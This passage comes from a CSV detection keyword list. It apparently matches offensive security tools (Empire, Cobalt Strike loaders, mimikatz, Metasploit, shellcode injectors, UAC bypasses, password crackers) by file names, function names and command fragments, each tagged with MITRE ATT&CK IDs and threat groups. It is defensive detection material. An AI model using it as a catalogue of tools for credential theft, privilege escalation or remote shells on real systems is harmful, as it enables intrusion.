- MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*emptybowl.py*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Web Attacks,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py,1,1,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*enable_persistence.py*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*Enable_Privilege /Process:* /Privilege:*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*EnableAllParentPrivileges.c*,offensive_tool_keyword,PSBits,Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*EnableAllParentPrivileges.exe*,offensive_tool_keyword,PSBits,Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*Enabled_Users1.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Enable-DuplicateToken*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*EnableRDesktopImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Enable-SeAssignPrimaryTokenPrivilege*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Enable-SeDebugPrivilege*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1102,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Enable-SeDebugPrivilege*,offensive_tool_keyword,mimikatz,Invoke-Mimikatz.ps1 function name,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*encdatavault2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*encfs2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*encode_payload rc4 *.txt*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*EncodeGroup/AggressiveProxy*,offensive_tool_keyword,cobaltstrike,Project to enumerate proxy configurations and generate shellcode from CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/AggressiveProxy,1,1,N/A,10,10,139,26,2020-11-04T16:08:11Z,2020-11-04T12:53:00Z -*EncodeGroup/UAC-SilentClean*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,1,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z -*encodeScriptPolyglot*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*EncodeShellcode(*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*encrypt.py *.bin -p * -o *.enc*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*encrypt/encryptFile.go*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,1,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*encrypt/encryptUrl.go*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,1,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*Encrypt-Bytes*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*encrypted_payload*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*EncryptedPfx.py*,offensive_tool_keyword,ADFSpoof,A python tool to forge AD FS security tokens.,T1600 - T1600.001 - T1552 - T1552.004,TA0006 - TA0001,N/A,N/A,Sniffing & Spoofing,https://github.com/mandiant/ADFSpoof,1,0,N/A,10,4,300,52,2023-09-21T17:14:52Z,2019-03-20T22:30:58Z -*EncryptedZIP.csproj*,offensive_tool_keyword,EncryptedZIP,Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory,T1564.001 - T1027 - T1214.001,TA0005 - TA0010,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*EncryptedZIP.exe*,offensive_tool_keyword,EncryptedZIP,Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory,T1564.001 - T1027 - T1214.001,TA0005 - TA0010,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*EncryptShellcode(*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*Endpoint-EE15B860-9EEC-EC11-BB3D-0022482CA4A7.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*ENDTHISFILETRANSMISSIONEGRESSASSESS*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*ENDTHISFILETRANSMISSIONEGRESSASSESS*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*Enelg52/KittyStager*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*Engineer_super.exe*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*engjibo/NetUser*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z -*enigma_fileless_uac_bypass*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*enigma0x3*,offensive_tool_keyword,Github Username,Github Author of malicious script and eploitaiton tools ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/enigma0x3,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*enkomio/AlanFramework*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*enpass2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*enpass5tojohn.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Enter-SMBSession -ComputerName *,offensive_tool_keyword,Invoke-SMBRemoting,Interactive Shell and Command Execution over Named-Pipes (SMB),T1059 - T1021.002 - T1572,TA0002 - TA0008 - TA0011,N/A,N/A,Lateral Movement,https://github.com/Leo4j/Invoke-SMBRemoting,1,0,N/A,9,1,22,4,2023-10-02T10:21:34Z,2023-09-06T16:00:47Z -*Enter-SMBSession* -PipeName * -ServiceName *,offensive_tool_keyword,Invoke-SMBRemoting,Interactive Shell and Command Execution over Named-Pipes (SMB),T1059 - T1021.002 - T1572,TA0002 - TA0008 - TA0011,N/A,N/A,Lateral Movement,https://github.com/Leo4j/Invoke-SMBRemoting,1,0,N/A,9,1,22,4,2023-10-02T10:21:34Z,2023-09-06T16:00:47Z -*Enter-WmiShell *,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,0,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*Enter-WmiShell.ps1*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,1,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -*--entrypoint Dinjector*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*enum_artifacts_list.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_av_excluded.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*enum_avproducts.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*enum_brocade.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides 